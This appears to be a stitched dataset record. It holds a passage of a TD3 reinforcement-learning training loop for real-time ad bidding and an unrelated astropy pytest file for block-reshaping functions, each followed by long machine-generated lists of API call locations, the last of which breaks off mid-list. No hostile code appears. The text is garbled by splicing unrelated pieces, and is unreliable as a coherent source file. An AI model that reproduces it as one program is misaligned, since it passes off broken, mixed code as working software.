    hb_base = sorted(hb_clk_dict.items(), key=lambda x: x[1])[-1][0]
    train_losses = []
    logger.info('para:{}, budget:{}, base bid: {}'.format(args.budget_para[0], B, hb_base))
    logger.info('\tclks\treal_clks\tbids\timps\tcost')
    start_time = datetime.datetime.now()
    # Column indices in train_data/test_data
    clk_index, ctr_index, mprice_index, hour_index = 0, 1, 2, 3
    ep_train_records = []
    ep_test_records = []
    ep_test_actions = []
    for ep in range(args.episodes):
        # ----- evaluation pass on the test split every 10 episodes -----
        if ep % 10 == 0:
            test_records = [0, 0, 0, 0, 0]
            tmp_test_state = [1, 0, 0, 0]
            init_test_state = [1, 0, 0, 0]
            test_actions = [0 for _ in range(24)]
            test_rewards = 0
            budget = B
            hour_t = 0
            for t in range(24):
                if budget > 0:
                    hour_datas = test_data[test_data[:, hour_index] == t]
                    state = torch.tensor(init_test_state).float() if not t else torch.tensor(tmp_test_state).float()
                    action = rl_model.choose_action(state.unsqueeze(0))[0, 0].item()
                    test_actions[t] = action
                    # FAB bid: scale the hb base bid by 1/(1 + action)
                    bid_datas = generate_bid_price((hour_datas[:, ctr_index] * hb_base / origin_ctr) / (1 + action))
                    res_ = bid_main(bid_datas, hour_datas, budget)
                    # win_clks, real_clks, bids, imps, cost
                    test_records = [test_records[i] + res_[i] for i in range(len(test_records))]
                    budget -= res_[-1]
                    hb_bid_datas = generate_bid_price(hour_datas[:, ctr_index] * hb_base / origin_ctr)
                    res_hb = bid_main(hb_bid_datas, hour_datas, budget)
                    # NOTE(review): res_[3] is imps, not cost -- confirm that
                    # passing imps into reward_func's cost slots is intended
                    r_t = reward_func(args.reward_type, res_[0], res_hb[0], res_[3], res_hb[3])
                    test_rewards += r_t
                    left_hour_ratio = (23 - t) / 23 if t <= 23 else 0
                    # avg_budget_ratio, cost_ratio, ctr, win_rate
                    next_state = [(budget / B) / left_hour_ratio if left_hour_ratio else (budget / B),
                                  res_[4] / B,
                                  res_[0] / res_[3] if res_[3] else 0,
                                  res_[3] / res_[2] if res_[2] else 0]
                    tmp_test_state = next_state
                    hour_t += 1
            ep_test_records.append([ep] + test_records + [test_rewards])
            ep_test_actions.append(test_actions)
            print(ep, 'test', test_records, test_rewards)
        # ----- training pass over 24 hour slots -----
        budget = B
        tmp_state = [1, 0, 0, 0]
        init_state = [1, 0, 0, 0]
        train_records = [0, 0, 0, 0, 0]
        # win_clks, real_clks, bids, imps, cost
        # win_clks, real_clks, bids, imps, cost = 0, 0, 0, 0, 0
        critic_loss = 0
        done = 0
        for t in range(24):
            if budget > 0:
                hour_datas = train_data[train_data[:, hour_index] == t]
                state = torch.tensor(init_state).float() if not t else torch.tensor(tmp_state).float()
                action = rl_model.choose_action(state.unsqueeze(0))[0, 0].item()
                bid_datas = generate_bid_price((hour_datas[:, ctr_index] * (hb_base / origin_ctr)) / (1 + action))
                res_ = bid_main(bid_datas, hour_datas, budget)
                # win_clks, real_clks, bids, imps, cost
                train_records = [train_records[i] + res_[i] for i in range(len(train_records))]
                budget -= res_[-1]
                left_hour_ratio = (23 - t) / 23 if t <= 23 else 0
                # Episode terminates at the last hour or when budget runs out
                if (not left_hour_ratio) or (budget <= 0):
                    done = 1
                # avg_budget_ratio, cost_ratio, ctr, win_rate
                next_state = [(budget / B) / left_hour_ratio if left_hour_ratio else (budget / B),
                              res_[4] / B,
                              res_[0] / res_[3] if res_[3] else 0,
                              res_[3] / res_[2] if res_[2] else 0]
                tmp_state = next_state
                hb_bid_datas = generate_bid_price(hour_datas[:, ctr_index] * hb_base / origin_ctr)
                res_hb = bid_main(hb_bid_datas, hour_datas, budget)
                # NOTE(review): res_[3] is imps, not cost -- see note above
                r_t = reward_func(args.reward_type, res_[0], res_hb[0], res_[3], res_hb[3])
                # Store (state, action, next_state, done, reward) and learn
                # once the replay memory holds a full batch
                transitions = torch.cat([state, torch.tensor([action]).float(),
                                           torch.tensor(next_state).float(),
                                           torch.tensor([done]).float(), torch.tensor([r_t]).float()], dim=-1).unsqueeze(
                    0).to(device)
                rl_model.store_transition(transitions)
                if rl_model.memory.memory_counter >= args.rl_batch_size:
                    critic_loss = rl_model.learn()
        if ep % 10 == 0:
            ep_train_records.append([ep] + train_records + [critic_loss])
            # print('train', records, critic_loss)
    # ----- persist per-episode records -----
    train_record_df = pd.DataFrame(data=ep_train_records,
                                   columns=['ep', 'clks', 'real_clks', 'bids', 'imps', 'cost', 'loss'])
    train_record_df.to_csv(submission_path + 'fab_train_records_' + args.reward_type + str(args.budget_para[0]) + '.csv', index=None)
    test_record_df = pd.DataFrame(data=ep_test_records,
                                  columns=['ep', 'clks', 'real_clks', 'bids', 'imps', 'cost', 'loss'])
    test_record_df.to_csv(submission_path + 'fab_test_records_' + args.reward_type + str(args.budget_para[0]) + '.csv', index=None)
    test_action_df = pd.DataFrame(data=ep_test_actions)
    test_action_df.to_csv(submission_path + 'fab_test_actions_' + args.reward_type + str(args.budget_para[0]) + '.csv')
| [
"os.mkdir",
"numpy.random.seed",
"numpy.sum",
"pandas.read_csv",
"logging.getLogger",
"numpy.arange",
"torch.device",
"pandas.DataFrame",
"os.path.exists",
"random.seed",
"datetime.datetime.now",
"torch.manual_seed",
"logging.StreamHandler",
"FAB.models.RL_brain_fab.TD3_Model",
"numpy.se... | [((326, 348), 'numpy.seterr', 'np.seterr', ([], {'all': '"""raise"""'}), "(all='raise')\n", (335, 348), True, 'import numpy as np\n'), ((377, 400), 'torch.manual_seed', 'torch.manual_seed', (['seed'], {}), '(seed)\n', (394, 400), False, 'import torch\n'), ((405, 437), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', (['seed'], {}), '(seed)\n', (431, 437), False, 'import torch\n'), ((442, 462), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (456, 462), True, 'import numpy as np\n'), ((467, 484), 'random.seed', 'random.seed', (['seed'], {}), '(seed)\n', (478, 484), False, 'import random\n'), ((3776, 3954), 'FAB.models.RL_brain_fab.TD3_Model', 'td3.TD3_Model', (['args.neuron_nums'], {'action_nums': '(1)', 'lr_A': 'args.lr_A', 'lr_C': 'args.lr_C', 'memory_size': 'args.memory_size', 'tau': 'args.tau', 'batch_size': 'args.rl_batch_size', 'device': 'device'}), '(args.neuron_nums, action_nums=1, lr_A=args.lr_A, lr_C=args.\n lr_C, memory_size=args.memory_size, tau=args.tau, batch_size=args.\n rl_batch_size, device=device)\n', (3789, 3954), True, 'import FAB.models.RL_brain_fab as td3\n'), ((5792, 5823), 'FAB.config.config.init_parser', 'config.init_parser', (['campaign_id'], {}), '(campaign_id)\n', (5810, 5823), False, 'from FAB.config import config\n'), ((6635, 6662), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (6652, 6662), False, 'import logging\n'), ((6720, 6753), 'logging.StreamHandler', 'logging.StreamHandler', (['sys.stdout'], {}), '(sys.stdout)\n', (6741, 6753), False, 'import logging\n'), ((7046, 7071), 'torch.device', 'torch.device', (['args.device'], {}), '(args.device)\n', (7058, 7071), False, 'import torch\n'), ((7878, 7901), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7899, 7901), False, 'import datetime\n'), ((12547, 12655), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'ep_train_records', 'columns': "['ep', 'clks', 'real_clks', 'bids', 'imps', 'cost', 
'loss']"}), "(data=ep_train_records, columns=['ep', 'clks', 'real_clks',\n 'bids', 'imps', 'cost', 'loss'])\n", (12559, 12655), True, 'import pandas as pd\n'), ((12843, 12950), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'ep_test_records', 'columns': "['ep', 'clks', 'real_clks', 'bids', 'imps', 'cost', 'loss']"}), "(data=ep_test_records, columns=['ep', 'clks', 'real_clks',\n 'bids', 'imps', 'cost', 'loss'])\n", (12855, 12950), True, 'import pandas as pd\n'), ((13135, 13169), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'ep_test_actions'}), '(data=ep_test_actions)\n', (13147, 13169), True, 'import pandas as pd\n'), ((896, 935), 'numpy.where', 'np.where', (['(bid_prices >= imp_datas[:, 2])'], {}), '(bid_prices >= imp_datas[:, 2])\n', (904, 935), True, 'import numpy as np\n'), ((1668, 1706), 'numpy.sum', 'np.sum', (['win_imp_datas[:final_index, 0]'], {}), '(win_imp_datas[:final_index, 0])\n', (1674, 1706), True, 'import numpy as np\n'), ((1783, 1818), 'numpy.sum', 'np.sum', (['imp_datas[:origin_index, 0]'], {}), '(imp_datas[:origin_index, 0])\n', (1789, 1818), True, 'import numpy as np\n'), ((1898, 1936), 'numpy.sum', 'np.sum', (['win_imp_datas[:final_index, 2]'], {}), '(win_imp_datas[:final_index, 2])\n', (1904, 1936), True, 'import numpy as np\n'), ((1960, 1998), 'numpy.sum', 'np.sum', (['win_imp_datas[:final_index, 2]'], {}), '(win_imp_datas[:final_index, 2])\n', (1966, 1998), True, 'import numpy as np\n'), ((4408, 4474), 'pandas.read_csv', 'pd.read_csv', (["(data_path + 'train.bid.' + args.sample_type + '.data')"], {}), "(data_path + 'train.bid.' + args.sample_type + '.data')\n", (4419, 4474), True, 'import pandas as pd\n'), ((4500, 4565), 'pandas.read_csv', 'pd.read_csv', (["(data_path + 'test.bid.' + args.sample_type + '.data')"], {}), "(data_path + 'test.bid.' 
+ args.sample_type + '.data')\n", (4511, 4565), True, 'import pandas as pd\n'), ((4752, 4776), 'numpy.sum', 'np.sum', (['train_data[:, 2]'], {}), '(train_data[:, 2])\n', (4758, 4776), True, 'import numpy as np\n'), ((4779, 4803), 'numpy.sum', 'np.sum', (['train_data[:, 0]'], {}), '(train_data[:, 0])\n', (4785, 4803), True, 'import numpy as np\n'), ((4821, 4845), 'numpy.sum', 'np.sum', (['train_data[:, 0]'], {}), '(train_data[:, 0])\n', (4827, 4845), True, 'import numpy as np\n'), ((4881, 4905), 'numpy.sum', 'np.sum', (['train_data[:, 2]'], {}), '(train_data[:, 2])\n', (4887, 4905), True, 'import numpy as np\n'), ((6965, 6996), 'os.path.exists', 'os.path.exists', (['submission_path'], {}), '(submission_path)\n', (6979, 6996), False, 'import os\n'), ((7006, 7031), 'os.mkdir', 'os.mkdir', (['submission_path'], {}), '(submission_path)\n', (7014, 7031), False, 'import os\n'), ((1249, 1279), 'numpy.sum', 'np.sum', (['win_imp_datas[:mid, 2]'], {}), '(win_imp_datas[:mid, 2])\n', (1255, 1279), True, 'import numpy as np\n'), ((6046, 6069), 'os.path.exists', 'os.path.exists', (['log_dir'], {}), '(log_dir)\n', (6060, 6069), False, 'import os\n'), ((6083, 6100), 'os.mkdir', 'os.mkdir', (['log_dir'], {}), '(log_dir)\n', (6091, 6100), False, 'import os\n'), ((6229, 6254), 'os.path.exists', 'os.path.exists', (['param_dir'], {}), '(param_dir)\n', (6243, 6254), False, 'import os\n'), ((6268, 6287), 'os.mkdir', 'os.mkdir', (['param_dir'], {}), '(param_dir)\n', (6276, 6287), False, 'import os\n'), ((1390, 1424), 'numpy.sum', 'np.sum', (['win_imp_datas[:mid - 1, 2]'], {}), '(win_imp_datas[:mid - 1, 2])\n', (1396, 1424), True, 'import numpy as np\n'), ((2985, 3023), 'numpy.sum', 'np.sum', (['final_imps[:last_win_index, 0]'], {}), '(final_imps[:last_win_index, 0])\n', (2991, 3023), True, 'import numpy as np\n'), ((7291, 7314), 'numpy.arange', 'np.arange', (['(100)', '(301)', '(10)'], {}), '(100, 301, 10)\n', (7300, 7314), True, 'import numpy as np\n'), ((2225, 2261), 'numpy.where', 
'np.where', (['(final_imps[:, 2] <= budget)'], {}), '(final_imps[:, 2] <= budget)\n', (2233, 2261), True, 'import numpy as np\n'), ((7233, 7252), 'numpy.arange', 'np.arange', (['(2)', '(20)', '(2)'], {}), '(2, 20, 2)\n', (7242, 7252), True, 'import numpy as np\n'), ((7261, 7282), 'numpy.arange', 'np.arange', (['(20)', '(100)', '(5)'], {}), '(20, 100, 5)\n', (7270, 7282), True, 'import numpy as np\n'), ((10562, 10586), 'torch.tensor', 'torch.tensor', (['init_state'], {}), '(init_state)\n', (10574, 10586), False, 'import torch\n'), ((10609, 10632), 'torch.tensor', 'torch.tensor', (['tmp_state'], {}), '(tmp_state)\n', (10621, 10632), False, 'import torch\n'), ((8524, 8553), 'torch.tensor', 'torch.tensor', (['init_test_state'], {}), '(init_test_state)\n', (8536, 8553), False, 'import torch\n'), ((8576, 8604), 'torch.tensor', 'torch.tensor', (['tmp_test_state'], {}), '(tmp_test_state)\n', (8588, 8604), False, 'import torch\n'), ((11935, 11957), 'torch.tensor', 'torch.tensor', (['[action]'], {}), '([action])\n', (11947, 11957), False, 'import torch\n'), ((12008, 12032), 'torch.tensor', 'torch.tensor', (['next_state'], {}), '(next_state)\n', (12020, 12032), False, 'import torch\n'), ((12083, 12103), 'torch.tensor', 'torch.tensor', (['[done]'], {}), '([done])\n', (12095, 12103), False, 'import torch\n'), ((12113, 12132), 'torch.tensor', 'torch.tensor', (['[r_t]'], {}), '([r_t])\n', (12125, 12132), False, 'import torch\n')] |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
import pytest
from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate
class TestReshapeAsBlocks:
    """Exercise reshape_as_blocks over valid shapes, views, and invalid block sizes."""

    def test_1d(self):
        data = np.arange(16)
        # each (block_size, expected_block_count) pair must reshape cleanly
        for size, nblocks in ((2, 8), (4, 4), (8, 2)):
            assert reshape_as_blocks(data, size).shape == (nblocks, size)

    def test_2d(self):
        arr = np.arange(16).reshape(4, 4)
        assert reshape_as_blocks(arr, (2, 2)).shape == (2, 2, 2, 2)
        arr = np.arange(64).reshape(8, 8)
        assert reshape_as_blocks(arr, (2, 2)).shape == (4, 4, 2, 2)
        assert reshape_as_blocks(arr, (4, 4)).shape == (2, 2, 4, 4)

    def test_3d(self):
        cube = np.arange(64).reshape(4, 4, 4)
        assert reshape_as_blocks(cube, (2, 2, 2)).shape == (2, 2, 2, 2, 2, 2)
        cube = np.arange(2 * 3 * 4).reshape(2, 3, 4)
        assert reshape_as_blocks(cube, (2, 1, 2)).shape == (1, 3, 2, 2, 1, 2)

    def test_view(self):
        # the result is a view: writes to the source must show through
        arr = np.arange(16).reshape(4, 4)
        blocked = reshape_as_blocks(arr, (2, 2))
        arr[0, 0] = 100
        assert blocked[0, 0, 0, 0] == 100

    def test_invalid_block_dim(self):
        cube = np.arange(64).reshape(4, 4, 4)
        match = ('block_size must be a scalar or have the same '
                 'length as the number of data dimensions')
        with pytest.raises(ValueError, match=match):
            reshape_as_blocks(cube, (2, 2))

    def test_invalid_block_size(self):
        arr = np.arange(16).reshape(4, 4)
        match = ('Each dimension of block_size must divide evenly '
                 'into the corresponding dimension of data')
        with pytest.raises(ValueError, match=match):
            reshape_as_blocks(arr, (2, 3))

    def test_invalid_block_value(self):
        arr = np.arange(16).reshape(4, 4)
        with pytest.raises(ValueError,
                           match='block_size elements must be integers'):
            reshape_as_blocks(arr, (2.1, 2))
        with pytest.raises(ValueError,
                           match='block_size elements must be strictly positive'):
            reshape_as_blocks(arr, (-1, 0))
class TestBlockReduce:
    """Exercise block_reduce for sums, means, trimming, and broadcasting."""

    def test_1d(self):
        """Test 1D array."""
        assert np.all(block_reduce(np.arange(4), 2) == np.array([1, 5]))

    def test_1d_mean(self):
        """Test 1D array with func=np.mean."""
        data = np.arange(4)
        size = 2.
        # mean-reduction must equal sum-reduction divided by the block size
        via_sum = block_reduce(data, size, func=np.sum) / size
        assert np.all(block_reduce(data, size, func=np.mean) == via_sum)

    def test_2d(self):
        """Test 2D array."""
        data = np.arange(4).reshape(2, 2)
        assert np.all(block_reduce(data, 2) == np.array([[6]]))

    def test_2d_mean(self):
        """Test 2D array with func=np.mean."""
        data = np.arange(4).reshape(2, 2)
        size = 2.
        # in 2D the normalization factor is block_size squared
        via_sum = block_reduce(data, size, func=np.sum) / size ** 2
        assert np.all(block_reduce(data, size, func=np.mean) == via_sum)

    def test_2d_trim(self):
        """
        Trailing rows/columns that do not fill a whole block must be
        trimmed, matching an explicit pre-crop of the input.
        """
        full = np.arange(15).reshape(5, 3)
        cropped = full[0:4, 0:2]
        assert np.all(block_reduce(full, 2) == block_reduce(cropped, 2))

    def test_block_size_broadcasting(self):
        """A scalar block_size must broadcast to every axis."""
        data = np.arange(16).reshape(4, 4)
        assert np.all(block_reduce(data, 2) == block_reduce(data, (2, 2)))

    def test_block_size_len(self):
        """A block_size longer than the data rank must be rejected."""
        with pytest.raises(ValueError):
            block_reduce(np.ones((2, 2)), (2, 2, 2))
class TestBlockReplicate:
    """Exercise block_replicate in 1D/2D with and without sum conservation."""

    def test_1d(self):
        """Test 1D array."""
        out = block_replicate(np.arange(2), 2)
        assert np.all(out == np.array([0, 0, 0.5, 0.5]))

    def test_1d_conserve_sum(self):
        """Test 1D array with conserve_sum=False."""
        data = np.arange(2)
        size = 2.
        # without conservation each value is simply repeated, i.e. the
        # conserving result scaled back up by the block size
        scaled = block_replicate(data, size) * size
        assert np.all(block_replicate(data, size, conserve_sum=False) == scaled)

    def test_2d(self):
        """Test 2D array."""
        data = np.arange(2).reshape(2, 1)
        expected = np.array([[0, 0], [0, 0], [0.25, 0.25], [0.25, 0.25]])
        assert np.all(block_replicate(data, 2) == expected)

    def test_2d_conserve_sum(self):
        """Test 2D array with conserve_sum=False."""
        data = np.arange(6).reshape(2, 3)
        size = 2.
        # 2D scaling factor is block_size squared
        scaled = block_replicate(data, size) * size ** 2
        assert np.all(block_replicate(data, size, conserve_sum=False) == scaled)

    def test_block_size_broadcasting(self):
        """A scalar block_size must broadcast to every axis."""
        data = np.arange(4).reshape(2, 2)
        assert np.all(block_replicate(data, 2) == block_replicate(data, (2, 2)))

    def test_block_size_len(self):
        """A block_size longer than the data rank must be rejected."""
        with pytest.raises(ValueError):
            block_replicate(np.arange(5), (2, 2))
| [
"numpy.ones",
"astropy.nddata.reshape_as_blocks",
"pytest.raises",
"numpy.array",
"numpy.arange",
"astropy.nddata.block_reduce",
"astropy.nddata.block_replicate",
"numpy.all"
] | [((242, 255), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (251, 255), True, 'import numpy as np\n'), ((275, 301), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2)'], {}), '(data, 2)\n', (292, 301), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((361, 387), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(4)'], {}), '(data, 4)\n', (378, 387), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((447, 473), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(8)'], {}), '(data, 8)\n', (464, 473), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((600, 631), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (617, 631), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((741, 772), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (758, 772), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((838, 869), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(4, 4)'], {}), '(data, (4, 4))\n', (855, 869), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((1005, 1039), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 2, 2)'], {}), '(data, (2, 2, 2))\n', (1022, 1039), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((1161, 1195), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 1, 2)'], {}), '(data, (2, 1, 2))\n', (1178, 1195), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((1336, 1367), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (1353, 1367), False, 'from 
astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2545, 2557), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (2554, 2557), True, 'import numpy as np\n'), ((2577, 2593), 'numpy.array', 'np.array', (['[1, 5]'], {}), '([1, 5])\n', (2585, 2593), True, 'import numpy as np\n'), ((2611, 2632), 'astropy.nddata.block_reduce', 'block_reduce', (['data', '(2)'], {}), '(data, 2)\n', (2623, 2632), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2648, 2674), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (2654, 2674), True, 'import numpy as np\n'), ((2766, 2778), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (2775, 2778), True, 'import numpy as np\n'), ((2901, 2945), 'astropy.nddata.block_reduce', 'block_reduce', (['data', 'block_size'], {'func': 'np.mean'}), '(data, block_size, func=np.mean)\n', (2913, 2945), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2961, 2992), 'numpy.all', 'np.all', (['(result_mean == expected)'], {}), '(result_mean == expected)\n', (2967, 2992), True, 'import numpy as np\n'), ((3107, 3122), 'numpy.array', 'np.array', (['[[6]]'], {}), '([[6]])\n', (3115, 3122), True, 'import numpy as np\n'), ((3140, 3161), 'astropy.nddata.block_reduce', 'block_reduce', (['data', '(2)'], {}), '(data, 2)\n', (3152, 3161), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((3177, 3203), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (3183, 3203), True, 'import numpy as np\n'), ((3464, 3508), 'astropy.nddata.block_reduce', 'block_reduce', (['data', 'block_size'], {'func': 'np.mean'}), '(data, block_size, func=np.mean)\n', (3476, 3508), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((3524, 3550), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (3530, 3550), True, 
'import numpy as np\n'), ((3761, 3783), 'astropy.nddata.block_reduce', 'block_reduce', (['data1', '(2)'], {}), '(data1, 2)\n', (3773, 3783), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((3834, 3856), 'astropy.nddata.block_reduce', 'block_reduce', (['data2', '(2)'], {}), '(data2, 2)\n', (3846, 3856), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((3872, 3898), 'numpy.all', 'np.all', (['(result1 == result2)'], {}), '(result1 == result2)\n', (3878, 3898), True, 'import numpy as np\n'), ((4056, 4077), 'astropy.nddata.block_reduce', 'block_reduce', (['data', '(2)'], {}), '(data, 2)\n', (4068, 4077), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4096, 4122), 'astropy.nddata.block_reduce', 'block_reduce', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (4108, 4122), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4138, 4164), 'numpy.all', 'np.all', (['(result1 == result2)'], {}), '(result1 == result2)\n', (4144, 4164), True, 'import numpy as np\n'), ((4254, 4269), 'numpy.ones', 'np.ones', (['(2, 2)'], {}), '((2, 2))\n', (4261, 4269), True, 'import numpy as np\n'), ((4447, 4459), 'numpy.arange', 'np.arange', (['(2)'], {}), '(2)\n', (4456, 4459), True, 'import numpy as np\n'), ((4479, 4505), 'numpy.array', 'np.array', (['[0, 0, 0.5, 0.5]'], {}), '([0, 0, 0.5, 0.5])\n', (4487, 4505), True, 'import numpy as np\n'), ((4523, 4547), 'astropy.nddata.block_replicate', 'block_replicate', (['data', '(2)'], {}), '(data, 2)\n', (4538, 4547), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4563, 4589), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (4569, 4589), True, 'import numpy as np\n'), ((4695, 4707), 'numpy.arange', 'np.arange', (['(2)'], {}), '(2)\n', (4704, 4707), True, 'import numpy as np\n'), ((4815, 4868), 
'astropy.nddata.block_replicate', 'block_replicate', (['data', 'block_size'], {'conserve_sum': '(False)'}), '(data, block_size, conserve_sum=False)\n', (4830, 4868), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4884, 4910), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (4890, 4910), True, 'import numpy as np\n'), ((5025, 5079), 'numpy.array', 'np.array', (['[[0, 0], [0, 0], [0.25, 0.25], [0.25, 0.25]]'], {}), '([[0, 0], [0, 0], [0.25, 0.25], [0.25, 0.25]])\n', (5033, 5079), True, 'import numpy as np\n'), ((5097, 5121), 'astropy.nddata.block_replicate', 'block_replicate', (['data', '(2)'], {}), '(data, 2)\n', (5112, 5121), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5137, 5163), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (5143, 5163), True, 'import numpy as np\n'), ((5406, 5459), 'astropy.nddata.block_replicate', 'block_replicate', (['data', 'block_size'], {'conserve_sum': '(False)'}), '(data, block_size, conserve_sum=False)\n', (5421, 5459), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5475, 5501), 'numpy.all', 'np.all', (['(result == expected)'], {}), '(result == expected)\n', (5481, 5501), True, 'import numpy as np\n'), ((5658, 5682), 'astropy.nddata.block_replicate', 'block_replicate', (['data', '(2)'], {}), '(data, 2)\n', (5673, 5682), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5701, 5730), 'astropy.nddata.block_replicate', 'block_replicate', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (5716, 5730), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5746, 5772), 'numpy.all', 'np.all', (['(result1 == result2)'], {}), '(result1 == result2)\n', (5752, 5772), True, 'import numpy as np\n'), ((5862, 5874), 'numpy.arange', 'np.arange', (['(5)'], {}), '(5)\n', (5871, 
5874), True, 'import numpy as np\n'), ((1659, 1697), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'match'}), '(ValueError, match=match)\n', (1672, 1697), False, 'import pytest\n'), ((1711, 1742), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (1728, 1742), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((1968, 2006), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'match'}), '(ValueError, match=match)\n', (1981, 2006), False, 'import pytest\n'), ((2020, 2051), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2, 3)'], {}), '(data, (2, 3))\n', (2037, 2051), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2204, 2242), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'match'}), '(ValueError, match=match)\n', (2217, 2242), False, 'import pytest\n'), ((2256, 2289), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(2.1, 2)'], {}), '(data, (2.1, 2))\n', (2273, 2289), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2368, 2406), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'match'}), '(ValueError, match=match)\n', (2381, 2406), False, 'import pytest\n'), ((2420, 2452), 'astropy.nddata.reshape_as_blocks', 'reshape_as_blocks', (['data', '(-1, 0)'], {}), '(data, (-1, 0))\n', (2437, 2452), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((2822, 2865), 'astropy.nddata.block_reduce', 'block_reduce', (['data', 'block_size'], {'func': 'np.sum'}), '(data, block_size, func=np.sum)\n', (2834, 2865), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((3366, 3409), 'astropy.nddata.block_reduce', 'block_reduce', (['data', 'block_size'], {'func': 'np.sum'}), '(data, block_size, func=np.sum)\n', (3378, 3409), False, 'from astropy.nddata 
import reshape_as_blocks, block_reduce, block_replicate\n'), ((4283, 4308), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (4296, 4308), False, 'import pytest\n'), ((4322, 4351), 'astropy.nddata.block_reduce', 'block_reduce', (['data', '(2, 2, 2)'], {}), '(data, (2, 2, 2))\n', (4334, 4351), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((4751, 4784), 'astropy.nddata.block_replicate', 'block_replicate', (['data', 'block_size'], {}), '(data, block_size)\n', (4766, 4784), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5339, 5372), 'astropy.nddata.block_replicate', 'block_replicate', (['data', 'block_size'], {}), '(data, block_size)\n', (5354, 5372), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((5888, 5913), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (5901, 5913), False, 'import pytest\n'), ((5927, 5956), 'astropy.nddata.block_replicate', 'block_replicate', (['data', '(2, 2)'], {}), '(data, (2, 2))\n', (5942, 5956), False, 'from astropy.nddata import reshape_as_blocks, block_reduce, block_replicate\n'), ((553, 566), 'numpy.arange', 'np.arange', (['(16)'], {}), '(16)\n', (562, 566), True, 'import numpy as np\n'), ((694, 707), 'numpy.arange', 'np.arange', (['(64)'], {}), '(64)\n', (703, 707), True, 'import numpy as np\n'), ((955, 968), 'numpy.arange', 'np.arange', (['(64)'], {}), '(64)\n', (964, 968), True, 'import numpy as np\n'), 